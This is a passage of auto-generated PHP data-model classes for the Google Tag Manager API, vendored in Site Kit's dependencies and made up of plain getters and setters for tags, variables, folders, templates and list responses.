Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class Variable extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'parameter'; /** * @var string */ public $accountId; /** * @var string */ public $containerId; /** * @var string[] */ public $disablingTriggerId; /** * @var string[] */ public $enablingTriggerId; /** * @var string */ public $fingerprint; protected $formatValueType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\VariableFormatValue::class; protected $formatValueDataType = ''; /** * @var string */ public $name; /** * @var string */ public $notes; protected $parameterType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $parameterDataType = 'array'; /** * @var string */ public $parentFolderId; /** * @var string */ public $path; /** * @var string */ public $scheduleEndMs; /** * @var string */ public $scheduleStartMs; /** * @var string */ public $tagManagerUrl; /** * @var string */ public $type; /** * @var string */ public $variableId; /** * @var string */ public $workspaceId; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setContainerId($containerId) { $this->containerId = $containerId; } /** * @return string */ public function getContainerId() { return $this->containerId; } /** * @param string[] */ public function setDisablingTriggerId($disablingTriggerId) { $this->disablingTriggerId = $disablingTriggerId; } /** * @return string[] */ public function getDisablingTriggerId() { return $this->disablingTriggerId; } /** * @param string[] */ public function setEnablingTriggerId($enablingTriggerId) { $this->enablingTriggerId = $enablingTriggerId; } /** * @return string[] */ public function getEnablingTriggerId() { return $this->enablingTriggerId; } /** * @param string */ public function setFingerprint($fingerprint) { $this->fingerprint = $fingerprint; } /** * @return string */ public function getFingerprint() { return $this->fingerprint; } /** * @param VariableFormatValue */ public function setFormatValue(\Google\Site_Kit_Dependencies\Google\Service\TagManager\VariableFormatValue $formatValue) { $this->formatValue = $formatValue; } /** * @return VariableFormatValue */ public function getFormatValue() { return $this->formatValue; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setNotes($notes) { $this->notes = $notes; } /** * @return string */ public function getNotes() { return $this->notes; } /** * @param Parameter[] */ public function setParameter($parameter) { $this->parameter = $parameter; } /** * @return Parameter[] */ public function getParameter() { return $this->parameter; } /** * @param string */ public function setParentFolderId($parentFolderId) { $this->parentFolderId = $parentFolderId; } /** * @return string */ public function getParentFolderId() { return $this->parentFolderId; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } /** * @param string */ public function setScheduleEndMs($scheduleEndMs) { $this->scheduleEndMs = $scheduleEndMs; } /** * @return string */ public function getScheduleEndMs() { return $this->scheduleEndMs; } /** * @param string */ public function setScheduleStartMs($scheduleStartMs) { $this->scheduleStartMs = $scheduleStartMs; } /** * @return string */ public function getScheduleStartMs() { return $this->scheduleStartMs; } /** * @param string */ public function setTagManagerUrl($tagManagerUrl) { $this->tagManagerUrl = $tagManagerUrl; } /** * @return string */ public function getTagManagerUrl() { return $this->tagManagerUrl; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setVariableId($variableId) { $this->variableId = $variableId; } /** * @return string */ public function getVariableId() { return $this->variableId; } /** * @param string */ public function setWorkspaceId($workspaceId) { $this->workspaceId = $workspaceId; } /** * @return string */ public function getWorkspaceId() { return $this->workspaceId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Variable::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Variable'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class Folder extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $accountId; /** * @var string */ public $containerId; /** * @var string */ public $fingerprint; /** * @var string */ public $folderId; /** * @var string */ public $name; /** * @var string */ public $notes; /** * @var string */ public $path; /** * @var string */ public $tagManagerUrl; /** * @var string */ public $workspaceId; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setContainerId($containerId) { $this->containerId = $containerId; } /** * @return string */ public function getContainerId() { return $this->containerId; } /** * @param string */ public function setFingerprint($fingerprint) { $this->fingerprint = $fingerprint; } /** * @return string */ public function getFingerprint() { return $this->fingerprint; } /** * @param string */ public function setFolderId($folderId) { $this->folderId = $folderId; } /** * @return string */ public function getFolderId() { return $this->folderId; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setNotes($notes) { $this->notes = $notes; } /** * @return string */ public function getNotes() { return $this->notes; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } /** * @param string */ public function setTagManagerUrl($tagManagerUrl) { $this->tagManagerUrl = $tagManagerUrl; } /** * @return string */ public function getTagManagerUrl() { return $this->tagManagerUrl; } /** * @param string */ public function setWorkspaceId($workspaceId) { $this->workspaceId = $workspaceId; } /** * @return string */ public function getWorkspaceId() { return $this->workspaceId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Folder::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Folder'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class Tag extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'teardownTag'; /** * @var string */ public $accountId; /** * @var string[] */ public $blockingRuleId; /** * @var string[] */ public $blockingTriggerId; protected $consentSettingsType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\TagConsentSetting::class; protected $consentSettingsDataType = ''; /** * @var string */ public $containerId; /** * @var string */ public $fingerprint; /** * @var string[] */ public $firingRuleId; /** * @var string[] */ public $firingTriggerId; /** * @var bool */ public $liveOnly; protected $monitoringMetadataType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $monitoringMetadataDataType = ''; /** * @var string */ public $monitoringMetadataTagNameKey; /** * @var string */ public $name; /** * @var string */ public $notes; protected $parameterType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $parameterDataType = 'array'; /** * @var string */ public $parentFolderId; /** * @var string */ public $path; /** * @var bool */ public $paused; protected $priorityType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $priorityDataType = ''; /** * @var string */ public $scheduleEndMs; /** * @var string */ public $scheduleStartMs; protected $setupTagType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\SetupTag::class; protected $setupTagDataType = 'array'; /** * @var string */ public $tagFiringOption; /** * @var string */ public $tagId; /** * @var string */ public $tagManagerUrl; protected $teardownTagType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\TeardownTag::class; protected $teardownTagDataType = 'array'; /** * @var string */ public $type; /** * @var string */ public $workspaceId; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string[] */ public function setBlockingRuleId($blockingRuleId) { $this->blockingRuleId = $blockingRuleId; } /** * @return string[] */ public function getBlockingRuleId() { return $this->blockingRuleId; } /** * @param string[] */ public function setBlockingTriggerId($blockingTriggerId) { $this->blockingTriggerId = $blockingTriggerId; } /** * @return string[] */ public function getBlockingTriggerId() { return $this->blockingTriggerId; } /** * @param TagConsentSetting */ public function setConsentSettings(\Google\Site_Kit_Dependencies\Google\Service\TagManager\TagConsentSetting $consentSettings) { $this->consentSettings = $consentSettings; } /** * @return TagConsentSetting */ public function getConsentSettings() { return $this->consentSettings; } /** * @param string */ public function setContainerId($containerId) { $this->containerId = $containerId; } /** * @return string */ public function getContainerId() { return $this->containerId; } /** * @param string */ public function setFingerprint($fingerprint) { $this->fingerprint = $fingerprint; } /** * @return string */ public function getFingerprint() { return $this->fingerprint; } /** * @param string[] */ public function setFiringRuleId($firingRuleId) { $this->firingRuleId = $firingRuleId; } /** * @return string[] */ public function getFiringRuleId() { return $this->firingRuleId; } /** * @param string[] */ public function setFiringTriggerId($firingTriggerId) { $this->firingTriggerId = $firingTriggerId; } /** * @return string[] */ public function getFiringTriggerId() { return $this->firingTriggerId; } /** * @param bool */ public function setLiveOnly($liveOnly) { $this->liveOnly = $liveOnly; } /** * @return bool */ public function getLiveOnly() { return $this->liveOnly; } /** * @param Parameter */ public function setMonitoringMetadata(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $monitoringMetadata) { $this->monitoringMetadata = $monitoringMetadata; } /** * @return Parameter */ public function getMonitoringMetadata() { return $this->monitoringMetadata; } /** * @param string */ public function setMonitoringMetadataTagNameKey($monitoringMetadataTagNameKey) { $this->monitoringMetadataTagNameKey = $monitoringMetadataTagNameKey; } /** * @return string */ public function getMonitoringMetadataTagNameKey() { return $this->monitoringMetadataTagNameKey; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setNotes($notes) { $this->notes = $notes; } /** * @return string */ public function getNotes() { return $this->notes; } /** * @param Parameter[] */ public function setParameter($parameter) { $this->parameter = $parameter; } /** * @return Parameter[] */ public function getParameter() { return $this->parameter; } /** * @param string */ public function setParentFolderId($parentFolderId) { $this->parentFolderId = $parentFolderId; } /** * @return string */ public function getParentFolderId() { return $this->parentFolderId; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } /** * @param bool */ public function setPaused($paused) { $this->paused = $paused; } /** * @return bool */ public function getPaused() { return $this->paused; } /** * @param Parameter */ public function setPriority(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter $priority) { $this->priority = $priority; } /** * @return Parameter */ public function getPriority() { return $this->priority; } /** * @param string */ public function setScheduleEndMs($scheduleEndMs) { $this->scheduleEndMs = $scheduleEndMs; } /** * @return string */ public function getScheduleEndMs() { return $this->scheduleEndMs; } /** * @param string */ public function setScheduleStartMs($scheduleStartMs) { $this->scheduleStartMs = $scheduleStartMs; } /** * @return string */ public function getScheduleStartMs() { return $this->scheduleStartMs; } /** * @param SetupTag[] */ public function setSetupTag($setupTag) { $this->setupTag = $setupTag; } /** * @return SetupTag[] */ public function getSetupTag() { return $this->setupTag; } /** * @param string */ public function setTagFiringOption($tagFiringOption) { $this->tagFiringOption = $tagFiringOption; } /** * @return string */ public function getTagFiringOption() { return $this->tagFiringOption; } /** * @param string */ public function setTagId($tagId) { $this->tagId = $tagId; } /** * @return string */ public function getTagId() { return $this->tagId; } /** * @param string */ public function setTagManagerUrl($tagManagerUrl) { $this->tagManagerUrl = $tagManagerUrl; } /** * @return string */ public function getTagManagerUrl() { return $this->tagManagerUrl; } /** * @param TeardownTag[] */ public function setTeardownTag($teardownTag) { $this->teardownTag = $teardownTag; } /** * @return TeardownTag[] */ public function getTeardownTag() { return $this->teardownTag; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setWorkspaceId($workspaceId) { $this->workspaceId = $workspaceId; } /** * @return string */ public function getWorkspaceId() { return $this->workspaceId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Tag::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Tag'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ListContainersResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'container'; protected $containerType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Container::class; protected $containerDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param Container[] */ public function setContainer($container) { $this->container = $container; } /** * @return Container[] */ public function getContainer() { return $this->container; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ListContainersResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ListContainersResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ListZonesResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'zone'; /** * @var string */ public $nextPageToken; protected $zoneType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Zone::class; protected $zoneDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param Zone[] */ public function setZone($zone) { $this->zone = $zone; } /** * @return Zone[] */ public function getZone() { return $this->zone; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ListZonesResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ListZonesResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class CustomTemplate extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $accountId; /** * @var string */ public $containerId; /** * @var string */ public $fingerprint; protected $galleryReferenceType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\GalleryReference::class; protected $galleryReferenceDataType = ''; /** * @var string */ public $name; /** * @var string */ public $path; /** * @var string */ public $tagManagerUrl; /** * @var string */ public $templateData; /** * @var string */ public $templateId; /** * @var string */ public $workspaceId; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setContainerId($containerId) { $this->containerId = $containerId; } /** * @return string */ public function getContainerId() { return $this->containerId; } /** * @param string */ public function setFingerprint($fingerprint) { $this->fingerprint = $fingerprint; } /** * @return string */ public function getFingerprint() { return $this->fingerprint; } /** * @param GalleryReference */ public function setGalleryReference(\Google\Site_Kit_Dependencies\Google\Service\TagManager\GalleryReference $galleryReference) { $this->galleryReference = $galleryReference; } /** * @return GalleryReference */ public function getGalleryReference() { return $this->galleryReference; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } /** * @param string */ public function setTagManagerUrl($tagManagerUrl) { $this->tagManagerUrl = $tagManagerUrl; } /** * @return string */ public function getTagManagerUrl() { return $this->tagManagerUrl; } /** * @param string */ public function setTemplateData($templateData) { $this->templateData = $templateData; } /** * @return string */ public function getTemplateData() { return $this->templateData; } /** * @param string */ public function setTemplateId($templateId) { $this->templateId = $templateId; } /** * @return string */ public function getTemplateId() { return $this->templateId; } /** * @param string */ public function setWorkspaceId($workspaceId) { $this->workspaceId = $workspaceId; } /** * @return string */ public function getWorkspaceId() { return $this->workspaceId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\CustomTemplate::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_CustomTemplate'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ZoneTypeRestriction extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'whitelistedTypeId'; /** * @var bool */ public $enable; /** * @var string[] */ public $whitelistedTypeId; /** * @param bool */ public function setEnable($enable) { $this->enable = $enable; } /** * @return bool */ public function getEnable() { return $this->enable; } /** * @param string[] */ public function setWhitelistedTypeId($whitelistedTypeId) { $this->whitelistedTypeId = $whitelistedTypeId; } /** * @return string[] */ public function getWhitelistedTypeId() { return $this->whitelistedTypeId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ZoneTypeRestriction::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ZoneTypeRestriction'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class RevertTriggerResponse extends \Google\Site_Kit_Dependencies\Google\Model { protected $triggerType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Trigger::class; protected $triggerDataType = ''; /** * @param Trigger */ public function setTrigger(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Trigger $trigger) { $this->trigger = $trigger; } /** * @return Trigger */ public function getTrigger() { return $this->trigger; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertTriggerResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_RevertTriggerResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class QuickPreviewResponse extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $compilerError; protected $containerVersionType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersion::class; protected $containerVersionDataType = ''; protected $syncStatusType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\SyncStatus::class; protected $syncStatusDataType = ''; /** * @param bool */ public function setCompilerError($compilerError) { $this->compilerError = $compilerError; } /** * @return bool */ public function getCompilerError() { return $this->compilerError; } /** * @param ContainerVersion */ public function setContainerVersion(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerVersion $containerVersion) { $this->containerVersion = $containerVersion; } /** * @return ContainerVersion */ public function getContainerVersion() { return $this->containerVersion; } /** * @param SyncStatus */ public function setSyncStatus(\Google\Site_Kit_Dependencies\Google\Service\TagManager\SyncStatus $syncStatus) { $this->syncStatus = $syncStatus; } /** * @return SyncStatus */ public function getSyncStatus() { return $this->syncStatus; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\QuickPreviewResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_QuickPreviewResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ListAccountsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'account'; protected $accountType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Account::class; protected $accountDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param Account[] */ public function setAccount($account) { $this->account = $account; } /** * @return Account[] */ public function getAccount() { return $this->account; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ListAccountsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ListAccountsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class Destination extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $accountId; /** * @var string */ public $containerId; /** * @var string */ public $destinationId; /** * @var string */ public $destinationLinkId; /** * @var string */ public $fingerprint; /** * @var string */ public $name; /** * @var string */ public $path; /** * @var string */ public $tagManagerUrl; /** * @param string */ public function setAccountId($accountId) { $this->accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setContainerId($containerId) { $this->containerId = $containerId; } /** * @return string */ public function getContainerId() { return $this->containerId; } /** * @param string */ public function setDestinationId($destinationId) { $this->destinationId = $destinationId; } /** * @return string */ public function getDestinationId() { return $this->destinationId; } /** * @param string */ public function setDestinationLinkId($destinationLinkId) { $this->destinationLinkId = $destinationLinkId; } /** * @return string */ public function getDestinationLinkId() { return $this->destinationLinkId; } /** * @param string */ public function setFingerprint($fingerprint) { $this->fingerprint = $fingerprint; } /** * @return string */ public function getFingerprint() { return $this->fingerprint; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } /** * @param string */ public function setTagManagerUrl($tagManagerUrl) { $this->tagManagerUrl = $tagManagerUrl; } /** * @return string */ public function getTagManagerUrl() { return $this->tagManagerUrl; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Destination::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Destination'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class GalleryReference extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $host; /** * @var bool */ public $isModified; /** * @var string */ public $owner; /** * @var string */ public $repository; /** * @var string */ public $signature; /** * @var string */ public $version; /** * @param string */ public function setHost($host) { $this->host = $host; } /** * @return string */ public function getHost() { return $this->host; } /** * @param bool */ public function setIsModified($isModified) { $this->isModified = $isModified; } /** * @return bool */ public function getIsModified() { return $this->isModified; } /** * @param string */ public function setOwner($owner) { $this->owner = $owner; } /** * @return string */ public function getOwner() { return $this->owner; } /** * @param string */ public function setRepository($repository) { $this->repository = $repository; } /** * @return string */ public function getRepository() { return $this->repository; } /** * @param string */ public function setSignature($signature) { $this->signature = $signature; } /** * @return string */ public function getSignature() { return $this->signature; } /** * @param string */ public function setVersion($version) { $this->version = $version; } /** * @return string */ public function getVersion() { return $this->version; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\GalleryReference::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_GalleryReference'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class ContainerAccess extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $containerId; /** * @var string */ public $permission; /** * @param string */ public function setContainerId($containerId) { $this->containerId = $containerId; } /** * @return string */ public function getContainerId() { return $this->containerId; } /** * @param string */ public function setPermission($permission) { $this->permission = $permission; } /** * @return string */ public function getPermission() { return $this->permission; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\ContainerAccess::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_ContainerAccess'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class Condition extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'parameter'; protected $parameterType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Parameter::class; protected $parameterDataType = 'array'; /** * @var string */ public $type; /** * @param Parameter[] */ public function setParameter($parameter) { $this->parameter = $parameter; } /** * @return Parameter[] */ public function getParameter() { return $this->parameter; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Condition::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_Condition'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class RevertTransformationResponse extends \Google\Site_Kit_Dependencies\Google\Model { protected $transformationType = \Google\Site_Kit_Dependencies\Google\Service\TagManager\Transformation::class; protected $transformationDataType = ''; /** * @param Transformation */ public function setTransformation(\Google\Site_Kit_Dependencies\Google\Service\TagManager\Transformation $transformation) { $this->transformation = $transformation; } /** * @return Transformation */ public function getTransformation() { return $this->transformation; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\TagManager\RevertTransformationResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_TagManager_RevertTransformationResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\TagManager; class AccountFeatures extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $supportMultipleContainers; /** * @var bool */ public $supportUserPermissions; /** * @param bool */ public function setSupportMultipleContainers($supportMultipleContainers) { $this->supportMultipleContainers = $supportMultipleContainers; } /** 